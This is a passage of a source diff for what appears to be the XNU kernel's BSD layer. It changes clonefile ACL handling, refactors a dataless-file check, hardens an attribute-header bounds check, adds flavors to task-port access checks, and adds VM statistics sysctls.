        kheap_free(KM_FD_VN_DATA, fvdata, sizeof(struct fd_vn_data));
 }
 
@@ -7990,14 +8002,14 @@ clonefile_internal(vnode_t fvp, boolean_t data_read_authorised, int dst_dirfd,
 
        /*
         * certain attributes may need to be changed from the source, we ask for
-        * those here.
+        * those here with the exception of source file's ACL. The clone file
+        * will inherit the target directory's ACL.
         */
        VATTR_INIT(&va);
        VATTR_WANTED(&va, va_uid);
        VATTR_WANTED(&va, va_gid);
        VATTR_WANTED(&va, va_mode);
        VATTR_WANTED(&va, va_flags);
-       VATTR_WANTED(&va, va_acl);
 
        if ((error = vnode_getattr(fvp, &va, ctx)) != 0) {
                goto out;
@@ -8061,7 +8073,7 @@ clonefile_internal(vnode_t fvp, boolean_t data_read_authorised, int dst_dirfd,
                 * If some of the requested attributes weren't handled by the
                 * VNOP, use our fallback code.
                 */
-               if (!VATTR_ALL_SUPPORTED(&va)) {
+               if (!VATTR_ALL_SUPPORTED(&nva)) {
                        (void)vnode_setattr_fallback(tvp, &nva, ctx);
                }
 
@@ -10577,8 +10589,9 @@ static LIST_HEAD(nspace_resolver_requesthead,
 static u_long nspace_resolver_request_hashmask;
 static u_int nspace_resolver_request_count;
 static bool nspace_resolver_request_wait_slot;
-static lck_grp_t *nspace_resolver_request_lck_grp;
-static lck_mtx_t nspace_resolver_request_hash_mutex;
+static LCK_GRP_DECLARE(nspace_resolver_request_lck_grp, "file namespace resolver");
+static LCK_MTX_DECLARE(nspace_resolver_request_hash_mutex,
+    &nspace_resolver_request_lck_grp);
 
 #define NSPACE_REQ_LOCK() \
        lck_mtx_lock(&nspace_resolver_request_hash_mutex)
@@ -10886,60 +10899,6 @@ nspace_materialization_set_thread_state(int is_prevented)
        return 0;
 }
 
-static int
-nspace_materialization_is_prevented(void)
-{
-       proc_t p = current_proc();
-       uthread_t ut = (uthread_t)get_bsdthread_info(current_thread());
-       vfs_context_t ctx = vfs_context_current();
-
-       /*
-        * Kernel context ==> return EDEADLK, as we would with any random
-        * process decorated as no-materialize.
-        */
-       if (ctx == vfs_context_kernel()) {
-               return EDEADLK;
-       }
-
-       /*
-        * If the process has the dataless-manipulation entitlement,
-        * materialization is prevented, and depending on the kind
-        * of file system operation, things get to proceed as if the
-        * object is not dataless.
-        */
-       if (vfs_context_is_dataless_manipulator(ctx)) {
-               return EJUSTRETURN;
-       }
-
-       /*
-        * Per-thread decorations override any process-wide decorations.
-        * (Foundation uses this, and this overrides even the dataless-
-        * manipulation entitlement so as to make API contracts consistent.)
-        */
-       if (ut != NULL) {
-               if (ut->uu_flag & UT_NSPACE_NODATALESSFAULTS) {
-                       return EDEADLK;
-               }
-               if (ut->uu_flag & UT_NSPACE_FORCEDATALESSFAULTS) {
-                       return 0;
-               }
-       }
-
-       /*
-        * If the process's iopolicy specifies that dataless files
-        * can be materialized, then we let it go ahead.
-        */
-       if (p->p_vfs_iopolicy & P_VFS_IOPOLICY_MATERIALIZE_DATALESS_FILES) {
-               return 0;
-       }
-
-       /*
-        * The default behavior is to not materialize dataless files;
-        * return to the caller that deadlock was detected.
-        */
-       return EDEADLK;
-}
-
 /* the vfs.nspace branch */
 SYSCTL_NODE(_vfs, OID_AUTO, nspace, CTLFLAG_RW | CTLFLAG_LOCKED, NULL, "vfs nspace hinge");
 
@@ -11078,16 +11037,67 @@ SYSCTL_PROC(_vfs_nspace, OID_AUTO, complete,
 #define __no_dataless_unused    __unused
 #endif
 
-void
-nspace_resolver_init(void)
+int
+vfs_context_dataless_materialization_is_prevented(
+       vfs_context_t const ctx __no_dataless_unused)
 {
 #if CONFIG_DATALESS_FILES
-       nspace_resolver_request_lck_grp =
-           lck_grp_alloc_init("file namespace resolver", NULL);
+       proc_t const p = vfs_context_proc(ctx);
+       thread_t const t = vfs_context_thread(ctx);
+       uthread_t const ut = t ? get_bsdthread_info(t) : NULL;
+
+       /*
+        * Kernel context ==> return EDEADLK, as we would with any random
+        * process decorated as no-materialize.
+        */
+       if (ctx == vfs_context_kernel()) {
+               return EDEADLK;
+       }
+
+       /*
+        * If the process has the dataless-manipulation entitlement,
+        * materialization is prevented, and depending on the kind
+        * of file system operation, things get to proceed as if the
+        * object is not dataless.
+        */
+       if (vfs_context_is_dataless_manipulator(ctx)) {
+               return EJUSTRETURN;
+       }
+
+       /*
+        * Per-thread decorations override any process-wide decorations.
+        * (Foundation uses this, and this overrides even the dataless-
+        * manipulation entitlement so as to make API contracts consistent.)
+        */
+       if (ut != NULL) {
+               if (ut->uu_flag & UT_NSPACE_NODATALESSFAULTS) {
+                       return EDEADLK;
+               }
+               if (ut->uu_flag & UT_NSPACE_FORCEDATALESSFAULTS) {
+                       return 0;
+               }
+       }
 
-       lck_mtx_init(&nspace_resolver_request_hash_mutex,
-           nspace_resolver_request_lck_grp, NULL);
+       /*
+        * If the process's iopolicy specifies that dataless files
+        * can be materialized, then we let it go ahead.
+        */
+       if (p->p_vfs_iopolicy & P_VFS_IOPOLICY_MATERIALIZE_DATALESS_FILES) {
+               return 0;
+       }
+#endif /* CONFIG_DATALESS_FILES */
 
+       /*
+        * The default behavior is to not materialize dataless files;
+        * return to the caller that deadlock was detected.
+        */
+       return EDEADLK;
+}
+
+void
+nspace_resolver_init(void)
+{
+#if CONFIG_DATALESS_FILES
        nspace_resolver_request_hashtbl =
            hashinit(NSPACE_RESOLVER_REQ_HASHSIZE,
            M_VNODE /* XXX */, &nspace_resolver_request_hashmask);
@@ -11186,7 +11196,8 @@ resolve_nspace_item_ext(
                return ENOTSUP;
        }
 
-       error = nspace_materialization_is_prevented();
+       error = vfs_context_dataless_materialization_is_prevented(
+               vfs_context_current());
        if (error) {
                os_log_debug(OS_LOG_DEFAULT,
                    "NSPACE process/thread is decorated as no-materialization");
index 0dfcf949f0f92ac2384c2d2efe4399082e1afc1c..8db2c859fa83f7ae1dfb947ba23bd15a0a2e3420 100644 (file)
@@ -3207,6 +3207,7 @@ check_and_swap_attrhdr(attr_header_t *ah, attr_info_t *ainfop)
         */
        end = ah->data_start + ah->data_length;
        if (ah->total_size > ainfop->finderinfo->offset + ainfop->finderinfo->length ||
+           ah->data_start < sizeof(attr_header_t) ||
            end < ah->data_start ||
            end > ah->total_size) {
                return EINVAL;
index 9421ee0f9655530125aeabfc02b06747f9b12bff..67aceb8d18ec4c589575a01831e590e8dc4fb731 100644 (file)
@@ -230,6 +230,13 @@ extern int cs_executable_wire;
 SYSCTL_INT(_vm, OID_AUTO, cs_executable_create_upl, CTLFLAG_RD | CTLFLAG_LOCKED, &cs_executable_create_upl, 0, "");
 SYSCTL_INT(_vm, OID_AUTO, cs_executable_wire, CTLFLAG_RD | CTLFLAG_LOCKED, &cs_executable_wire, 0, "");
 
+extern int apple_protect_pager_count;
+extern int apple_protect_pager_count_mapped;
+extern unsigned int apple_protect_pager_cache_limit;
+SYSCTL_INT(_vm, OID_AUTO, apple_protect_pager_count, CTLFLAG_RD | CTLFLAG_LOCKED, &apple_protect_pager_count, 0, "");
+SYSCTL_INT(_vm, OID_AUTO, apple_protect_pager_count_mapped, CTLFLAG_RD | CTLFLAG_LOCKED, &apple_protect_pager_count_mapped, 0, "");
+SYSCTL_UINT(_vm, OID_AUTO, apple_protect_pager_cache_limit, CTLFLAG_RW | CTLFLAG_LOCKED, &apple_protect_pager_cache_limit, 0, "");
+
 #if DEVELOPMENT || DEBUG
 extern int radar_20146450;
 SYSCTL_INT(_vm, OID_AUTO, radar_20146450, CTLFLAG_RW | CTLFLAG_LOCKED, &radar_20146450, 0, "");
@@ -316,7 +323,7 @@ SYSCTL_INT(_vm, OID_AUTO, vm_shadow_max_enabled, CTLFLAG_RW | CTLFLAG_LOCKED, &v
 SYSCTL_INT(_vm, OID_AUTO, vm_debug_events, CTLFLAG_RW | CTLFLAG_LOCKED, &vm_debug_events, 0, "");
 
 __attribute__((noinline)) int __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(
-       mach_port_t task_access_port, int32_t calling_pid, uint32_t calling_gid, int32_t target_pid);
+       mach_port_t task_access_port, int32_t calling_pid, uint32_t calling_gid, int32_t target_pid, mach_task_flavor_t flavor);
 /*
  * Sysctl's related to data/stack execution.  See osfmk/vm/vm_map.c
  */
@@ -844,9 +851,9 @@ out:
  */
 __attribute__((noinline)) int
 __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(
-       mach_port_t task_access_port, int32_t calling_pid, uint32_t calling_gid, int32_t target_pid)
+       mach_port_t task_access_port, int32_t calling_pid, uint32_t calling_gid, int32_t target_pid, mach_task_flavor_t flavor)
 {
-       return check_task_access(task_access_port, calling_pid, calling_gid, target_pid);
+       return check_task_access_with_flavor(task_access_port, calling_pid, calling_gid, target_pid, flavor);
 }
 
 /*
@@ -885,14 +892,14 @@ task_for_pid(
 
        /* Always check if pid == 0 */
        if (pid == 0) {
-               (void) copyout((char *)&t1, task_addr, sizeof(mach_port_name_t));
+               (void) copyout((char *)&tret, task_addr, sizeof(mach_port_name_t));
                AUDIT_MACH_SYSCALL_EXIT(KERN_FAILURE);
                return KERN_FAILURE;
        }
 
        t1 = port_name_to_task(target_tport);
        if (t1 == TASK_NULL) {
-               (void) copyout((char *)&t1, task_addr, sizeof(mach_port_name_t));
+               (void) copyout((char *)&tret, task_addr, sizeof(mach_port_name_t));
                AUDIT_MACH_SYSCALL_EXIT(KERN_FAILURE);
                return KERN_FAILURE;
        }
@@ -931,7 +938,7 @@ task_for_pid(
        p = PROC_NULL;
 
 #if CONFIG_MACF
-       error = mac_proc_check_get_task(kauth_cred_get(), &pident);
+       error = mac_proc_check_get_task(kauth_cred_get(), &pident, TASK_FLAVOR_CONTROL);
        if (error) {
                error = KERN_FAILURE;
                goto tfpout;
@@ -949,7 +956,8 @@ task_for_pid(
                }
 
                /* Call up to the task access server */
-               error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport, proc_selfpid(), kauth_getgid(), pid);
+               error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport,
+                   proc_selfpid(), kauth_getgid(), pid, TASK_FLAVOR_CONTROL);
 
                if (error != MACH_MSG_SUCCESS) {
                        if (error == MACH_RCV_INTERRUPTED) {
@@ -963,7 +971,13 @@ task_for_pid(
 
        /* Grant task port access */
        extmod_statistics_incr_task_for_pid(task);
-       sright = (void *) convert_task_to_port(task);
+
+       if (task == current_task()) {
+               /* return pinned self if current_task() so equality check with mach_task_self_ passes */
+               sright = (void *)convert_task_to_port_pinned(task);
+       } else {
+               sright = (void *)convert_task_to_port(task);
+       }
 
        /* Check if the task has been corpsified */
        if (is_corpsetask(task)) {
@@ -1019,9 +1033,9 @@ task_name_for_pid(
        mach_port_name_t        target_tport = args->target_tport;
        int                     pid = args->pid;
        user_addr_t             task_addr = args->t;
-       proc_t          p = PROC_NULL;
-       task_t          t1;
-       mach_port_name_t        tret;
+       proc_t                  p = PROC_NULL;
+       task_t                  t1 = TASK_NULL;
+       mach_port_name_t        tret = MACH_PORT_NULL;
        void * sright;
        int error = 0, refheld = 0;
        kauth_cred_t target_cred;
@@ -1032,7 +1046,7 @@ task_name_for_pid(
 
        t1 = port_name_to_task(target_tport);
        if (t1 == TASK_NULL) {
-               (void) copyout((char *)&t1, task_addr, sizeof(mach_port_name_t));
+               (void) copyout((char *)&tret, task_addr, sizeof(mach_port_name_t));
                AUDIT_MACH_SYSCALL_EXIT(KERN_FAILURE);
                return KERN_FAILURE;
        }
@@ -1057,7 +1071,7 @@ task_name_for_pid(
                                proc_rele(p);
                                p = PROC_NULL;
 #if CONFIG_MACF
-                               error = mac_proc_check_get_task_name(kauth_cred_get(), &pident);
+                               error = mac_proc_check_get_task(kauth_cred_get(), &pident, TASK_FLAVOR_NAME);
                                if (error) {
                                        task_deallocate(task);
                                        goto noperm;
@@ -1122,13 +1136,13 @@ task_inspect_for_pid(struct proc *p __unused, struct task_inspect_for_pid_args *
 
        /* Disallow inspect port for kernel_task */
        if (pid == 0) {
-               (void) copyout((char *)&t1, task_addr, sizeof(mach_port_name_t));
+               (void) copyout((char *)&tret, task_addr, sizeof(mach_port_name_t));
                return EPERM;
        }
 
        t1 = port_name_to_task(target_tport);
        if (t1 == TASK_NULL) {
-               (void) copyout((char *) &t1, task_addr, sizeof(mach_port_name_t));
+               (void) copyout((char *) &tret, task_addr, sizeof(mach_port_name_t));
                return EINVAL;
        }
 
@@ -1158,12 +1172,8 @@ task_inspect_for_pid(struct proc *p __unused, struct task_inspect_for_pid_args *
        proc_rele(proc);
        proc = PROC_NULL;
 
-       /*
-        * For now, it performs the same set of permission checks as task_for_pid. This
-        * will be addressed in rdar://problem/53478660
-        */
 #if CONFIG_MACF
-       error = mac_proc_check_get_task(kauth_cred_get(), &pident);
+       error = mac_proc_check_get_task(kauth_cred_get(), &pident, TASK_FLAVOR_INSPECT);
        if (error) {
                error = EPERM;
                goto tifpout;
@@ -1182,7 +1192,8 @@ task_inspect_for_pid(struct proc *p __unused, struct task_inspect_for_pid_args *
 
 
                /* Call up to the task access server */
-               error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport, proc_selfpid(), kauth_getgid(), pid);
+               error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport,
+                   proc_selfpid(), kauth_getgid(), pid, TASK_FLAVOR_INSPECT);
 
                if (error != MACH_MSG_SUCCESS) {
                        if (error == MACH_RCV_INTERRUPTED) {
@@ -1247,13 +1258,13 @@ task_read_for_pid(struct proc *p __unused, struct task_read_for_pid_args *args,
 
        /* Disallow read port for kernel_task */
        if (pid == 0) {
-               (void) copyout((char *)&t1, task_addr, sizeof(mach_port_name_t));
+               (void) copyout((char *)&tret, task_addr, sizeof(mach_port_name_t));
                return EPERM;
        }
 
        t1 = port_name_to_task(target_tport);
        if (t1 == TASK_NULL) {
-               (void) copyout((char *) &t1, task_addr, sizeof(mach_port_name_t));
+               (void) copyout((char *)&tret, task_addr, sizeof(mach_port_name_t));
                return EINVAL;
        }
 
@@ -1283,12 +1294,8 @@ task_read_for_pid(struct proc *p __unused, struct task_read_for_pid_args *args,
        proc_rele(proc);
        proc = PROC_NULL;
 
-       /*
-        * For now, it performs the same set of permission checks as task_for_pid. This
-        * will be addressed in rdar://problem/53478660
-        */
 #if CONFIG_MACF
-       error = mac_proc_check_get_task(kauth_cred_get(), &pident);
+       error = mac_proc_check_get_task(kauth_cred_get(), &pident, TASK_FLAVOR_READ);
        if (error) {
                error = EPERM;
                goto trfpout;
@@ -1307,7 +1314,8 @@ task_read_for_pid(struct proc *p __unused, struct task_read_for_pid_args *args,
 
 
                /* Call up to the task access server */
-               error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport, proc_selfpid(), kauth_getgid(), pid);
+               error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport,
+                   proc_selfpid(), kauth_getgid(), pid, TASK_FLAVOR_READ);
 
                if (error != MACH_MSG_SUCCESS) {
                        if (error == MACH_RCV_INTERRUPTED) {
@@ -1382,7 +1390,7 @@ pid_suspend(struct proc *p __unused, struct pid_suspend_args *args, int *ret)
 #endif
 
        target = targetproc->task;
-#ifndef CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
        if (target != TASK_NULL) {
                /* If we aren't root and target's task access port is set... */
                if (!kauth_cred_issuser(kauth_cred_get()) &&
@@ -1395,7 +1403,8 @@ pid_suspend(struct proc *p __unused, struct pid_suspend_args *args, int *ret)
                        }
 
                        /* Call up to the task access server */
-                       error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport, proc_selfpid(), kauth_getgid(), pid);
+                       error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport,
+                           proc_selfpid(), kauth_getgid(), pid, TASK_FLAVOR_CONTROL);
 
                        if (error != MACH_MSG_SUCCESS) {
                                if (error == MACH_RCV_INTERRUPTED) {
@@ -1407,7 +1416,7 @@ pid_suspend(struct proc *p __unused, struct pid_suspend_args *args, int *ret)
                        }
                }
        }
-#endif
+#endif /* XNU_TARGET_OS_OSX */
 
        task_reference(target);
        error = task_pidsuspend(target);
@@ -1460,14 +1469,14 @@ debug_control_port_for_pid(struct debug_control_port_for_pid_args *args)
 
        /* Always check if pid == 0 */
        if (pid == 0) {
-               (void) copyout((char *)&t1, task_addr, sizeof(mach_port_name_t));
+               (void) copyout((char *)&tret, task_addr, sizeof(mach_port_name_t));
                AUDIT_MACH_SYSCALL_EXIT(KERN_FAILURE);
                return KERN_FAILURE;
        }
 
        t1 = port_name_to_task(target_tport);
        if (t1 == TASK_NULL) {
-               (void) copyout((char *)&t1, task_addr, sizeof(mach_port_name_t));
+               (void) copyout((char *)&tret, task_addr, sizeof(mach_port_name_t));
                AUDIT_MACH_SYSCALL_EXIT(KERN_FAILURE);
                return KERN_FAILURE;
        }
@@ -1505,7 +1514,7 @@ debug_control_port_for_pid(struct debug_control_port_for_pid_args *args)
 
        if (!IOTaskHasEntitlement(current_task(), DEBUG_PORT_ENTITLEMENT)) {
 #if CONFIG_MACF
-               error = mac_proc_check_get_task(kauth_cred_get(), &pident);
+               error = mac_proc_check_get_task(kauth_cred_get(), &pident, TASK_FLAVOR_CONTROL);
                if (error) {
                        error = KERN_FAILURE;
                        goto tfpout;
@@ -1524,7 +1533,8 @@ debug_control_port_for_pid(struct debug_control_port_for_pid_args *args)
 
 
                        /* Call up to the task access server */
-                       error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport, proc_selfpid(), kauth_getgid(), pid);
+                       error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport,
+                           proc_selfpid(), kauth_getgid(), pid, TASK_FLAVOR_CONTROL);
 
                        if (error != MACH_MSG_SUCCESS) {
                                if (error == MACH_RCV_INTERRUPTED) {
@@ -1607,7 +1617,7 @@ pid_resume(struct proc *p __unused, struct pid_resume_args *args, int *ret)
 #endif
 
        target = targetproc->task;
-#ifndef CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
        if (target != TASK_NULL) {
                /* If we aren't root and target's task access port is set... */
                if (!kauth_cred_issuser(kauth_cred_get()) &&
@@ -1620,7 +1630,8 @@ pid_resume(struct proc *p __unused, struct pid_resume_args *args, int *ret)
                        }
 
                        /* Call up to the task access server */
-                       error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport, proc_selfpid(), kauth_getgid(), pid);
+                       error = __KERNEL_WAITING_ON_TASKGATED_CHECK_ACCESS_UPCALL__(tfpport,
+                           proc_selfpid(), kauth_getgid(), pid, TASK_FLAVOR_CONTROL);
 
                        if (error != MACH_MSG_SUCCESS) {
                                if (error == MACH_RCV_INTERRUPTED) {
@@ -1632,7 +1643,7 @@ pid_resume(struct proc *p __unused, struct pid_resume_args *args, int *ret)
                        }
                }
        }
-#endif
+#endif /* XNU_TARGET_OS_OSX */
 
 #if !XNU_TARGET_OS_OSX
 #if SOCKETS
@@ -1675,7 +1686,7 @@ out:
        return error;
 }
 
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
 /*
  * Freeze the specified process (provided in args->pid), or find and freeze a PID.
  * When a process is specified, this call is blocking, otherwise we wake up the
@@ -1737,7 +1748,7 @@ out:
        *ret = error;
        return error;
 }
-#endif /* CONFIG_EMBEDDED */
+#endif /* !XNU_TARGET_OS_OSX */
 
 #if SOCKETS
 int
@@ -1750,7 +1761,7 @@ networking_memstatus_callout(proc_t p, uint32_t status)
         * proc lock NOT held
         * a reference on the proc has been held / shall be dropped by the caller.
         */
-       LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED);
+       LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED);
        LCK_MTX_ASSERT(&p->p_mlock, LCK_MTX_ASSERT_NOTOWNED);
 
        proc_fdlock(p);
@@ -1946,6 +1957,7 @@ shared_region_check_np(
        mach_vm_offset_t        start_address = 0;
        int                     error = 0;
        kern_return_t           kr;
+       task_t                  task = current_task();
 
        SHARED_REGION_TRACE_DEBUG(
                ("shared_region: %p [%d(%s)] -> check_np(0x%llx)\n",
@@ -1954,10 +1966,10 @@ shared_region_check_np(
                (uint64_t)uap->start_address));
 
        /* retrieve the current tasks's shared region */
-       shared_region = vm_shared_region_get(current_task());
+       shared_region = vm_shared_region_get(task);
        if (shared_region != NULL) {
                /* retrieve address of its first mapping... */
-               kr = vm_shared_region_start_address(shared_region, &start_address);
+               kr = vm_shared_region_start_address(shared_region, &start_address, task);
                if (kr != KERN_SUCCESS) {
                        error = ENOMEM;
                } else {
@@ -2714,7 +2726,11 @@ done:
  * a max value. The kernel will choose a random value based on that, then use it
  * for all shared regions.
  */
-#define SLIDE_AMOUNT_MASK ~PAGE_MASK
+#if defined (__x86_64__)
+#define SLIDE_AMOUNT_MASK ~FOURK_PAGE_MASK
+#else
+#define SLIDE_AMOUNT_MASK ~SIXTEENK_PAGE_MASK
+#endif
 
 int
 shared_region_map_and_slide_2_np(
@@ -2827,7 +2843,7 @@ shared_region_map_and_slide_2_np(
                                }
                                mappings[m].sms_address += slide_amount;
                                if (mappings[m].sms_slide_size != 0) {
-                                       mappings[i].sms_slide_start += slide_amount;
+                                       mappings[m].sms_slide_start += slide_amount;
                                }
                        }
                }
@@ -2894,19 +2910,8 @@ static int vm_mixed_pagesize_supported = 0;
 SYSCTL_INT(_debug, OID_AUTO, vm_mixed_pagesize_supported, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED,
     &vm_mixed_pagesize_supported, 0, "kernel support for mixed pagesize");
 
-
-extern uint64_t get_pages_grabbed_count(void);
-
-static int
-pages_grabbed SYSCTL_HANDLER_ARGS
-{
-#pragma unused(arg1, arg2, oidp)
-       uint64_t value = get_pages_grabbed_count();
-       return SYSCTL_OUT(req, &value, sizeof(value));
-}
-
-SYSCTL_PROC(_vm, OID_AUTO, pages_grabbed, CTLTYPE_QUAD | CTLFLAG_RD | CTLFLAG_LOCKED,
-    0, 0, &pages_grabbed, "QU", "Total pages grabbed");
+SCALABLE_COUNTER_DECLARE(vm_page_grab_count);
+SYSCTL_SCALABLE_COUNTER(_vm, pages_grabbed, vm_page_grab_count, "Total pages grabbed");
 SYSCTL_ULONG(_vm, OID_AUTO, pages_freed, CTLFLAG_RD | CTLFLAG_LOCKED,
     &vm_pageout_vminfo.vm_page_pages_freed, "Total pages freed");
 
@@ -3344,6 +3349,47 @@ extern int pmap_ledgers_panic_leeway;
 SYSCTL_INT(_vm, OID_AUTO, pmap_ledgers_panic_leeway, CTLFLAG_RW | CTLFLAG_LOCKED, &pmap_ledgers_panic_leeway, 0, "");
 #endif /* MACH_ASSERT */
 
+
+extern uint64_t vm_map_lookup_locked_copy_slowly_count;
+extern uint64_t vm_map_lookup_locked_copy_slowly_size;
+extern uint64_t vm_map_lookup_locked_copy_slowly_max;
+extern uint64_t vm_map_lookup_locked_copy_slowly_restart;
+extern uint64_t vm_map_lookup_locked_copy_slowly_error;
+extern uint64_t vm_map_lookup_locked_copy_strategically_count;
+extern uint64_t vm_map_lookup_locked_copy_strategically_size;
+extern uint64_t vm_map_lookup_locked_copy_strategically_max;
+extern uint64_t vm_map_lookup_locked_copy_strategically_restart;
+extern uint64_t vm_map_lookup_locked_copy_strategically_error;
+extern uint64_t vm_map_lookup_locked_copy_shadow_count;
+extern uint64_t vm_map_lookup_locked_copy_shadow_size;
+extern uint64_t vm_map_lookup_locked_copy_shadow_max;
+SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_slowly_count,
+    CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_slowly_count, "");
+SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_slowly_size,
+    CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_slowly_size, "");
+SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_slowly_max,
+    CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_slowly_max, "");
+SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_slowly_restart,
+    CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_slowly_restart, "");
+SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_slowly_error,
+    CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_slowly_error, "");
+SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_strategically_count,
+    CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_strategically_count, "");
+SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_strategically_size,
+    CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_strategically_size, "");
+SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_strategically_max,
+    CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_strategically_max, "");
+SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_strategically_restart,
+    CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_strategically_restart, "");
+SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_strategically_error,
+    CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_strategically_error, "");
+SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_shadow_count,
+    CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_shadow_count, "");
+SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_shadow_size,
+    CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_shadow_size, "");
+SYSCTL_QUAD(_vm, OID_AUTO, map_lookup_locked_copy_shadow_max,
+    CTLFLAG_RD | CTLFLAG_LOCKED, &vm_map_lookup_locked_copy_shadow_max, "");
+
 extern int vm_protect_privileged_from_untrusted;
 SYSCTL_INT(_vm, OID_AUTO, protect_privileged_from_untrusted,
     CTLFLAG_RW | CTLFLAG_LOCKED, &vm_protect_privileged_from_untrusted, 0, "");
@@ -3416,8 +3462,84 @@ SYSCTL_PROC(_vm, OID_AUTO, shared_region_pivot,
     CTLTYPE_INT | CTLFLAG_WR | CTLFLAG_LOCKED,
     0, 0, shared_region_pivot, "I", "");
 
-extern int vm_remap_old_path, vm_remap_new_path;
-SYSCTL_INT(_vm, OID_AUTO, remap_old_path,
-    CTLFLAG_RD | CTLFLAG_LOCKED, &vm_remap_old_path, 0, "");
-SYSCTL_INT(_vm, OID_AUTO, remap_new_path,
-    CTLFLAG_RD | CTLFLAG_LOCKED, &vm_remap_new_path, 0, "");
+/*
+ * sysctl to return the number of pages on retired_pages_object
+ */
+static int
+retired_pages_count SYSCTL_HANDLER_ARGS
+{
+#pragma unused(arg1, arg2, oidp)
+       extern uint32_t vm_retired_pages_count(void);
+       uint32_t value = vm_retired_pages_count();
+
+       return SYSCTL_OUT(req, &value, sizeof(value));
+}
+SYSCTL_PROC(_vm, OID_AUTO, retired_pages_count, CTLTYPE_INT | CTLFLAG_RD | CTLFLAG_LOCKED,
+    0, 0, &retired_pages_count, "I", "");
+
+SYSCTL_INT(_vm, OID_AUTO, vmtc_total, CTLFLAG_RD | CTLFLAG_LOCKED,
+    &vmtc_total, 0, "total text page corruptions detected");
+SYSCTL_INT(_vm, OID_AUTO, vmtc_undiagnosed, CTLFLAG_RD | CTLFLAG_LOCKED,
+    &vmtc_undiagnosed, 0, "undiagnosed text page corruptions");
+SYSCTL_INT(_vm, OID_AUTO, vmtc_not_eligible, CTLFLAG_RD | CTLFLAG_LOCKED,
+    &vmtc_not_eligible, 0, "text page corruptions not eligible for correction");
+SYSCTL_INT(_vm, OID_AUTO, vmtc_copyin_fail, CTLFLAG_RD | CTLFLAG_LOCKED,
+    &vmtc_copyin_fail, 0, "undiagnosed text page corruptions due to copyin failure");
+SYSCTL_INT(_vm, OID_AUTO, vmtc_not_found, CTLFLAG_RD | CTLFLAG_LOCKED,
+    &vmtc_not_found, 0, "text page corruptions but no diff found");
+SYSCTL_INT(_vm, OID_AUTO, vmtc_one_bit_flip, CTLFLAG_RD | CTLFLAG_LOCKED,
+    &vmtc_one_bit_flip, 0, "text page corruptions that had a single bit flip");
+
+SYSCTL_INT(_vm, OID_AUTO, vmtc_1_byte, CTLFLAG_RD | CTLFLAG_LOCKED,
+    &vmtc_byte_counts[0], 0, "text page corruptions with 1 changed byte");
+
+SYSCTL_INT(_vm, OID_AUTO, vmtc_2_byte, CTLFLAG_RD | CTLFLAG_LOCKED,
+    &vmtc_byte_counts[1], 0, "text page corruptions with 2 changed bytes");
+
+SYSCTL_INT(_vm, OID_AUTO, vmtc_4_byte, CTLFLAG_RD | CTLFLAG_LOCKED,
+    &vmtc_byte_counts[2], 0, "text page corruptions with 3 to 4 changed bytes");
+
+SYSCTL_INT(_vm, OID_AUTO, vmtc_8_byte, CTLFLAG_RD | CTLFLAG_LOCKED,
+    &vmtc_byte_counts[3], 0, "text page corruptions with 5 to 8 changed bytes");
+
+SYSCTL_INT(_vm, OID_AUTO, vmtc_16_byte, CTLFLAG_RD | CTLFLAG_LOCKED,
+    &vmtc_byte_counts[4], 0, "text page corruptions with 9 to 16 changed bytes");
+
+SYSCTL_INT(_vm, OID_AUTO, vmtc_32_byte, CTLFLAG_RD | CTLFLAG_LOCKED,
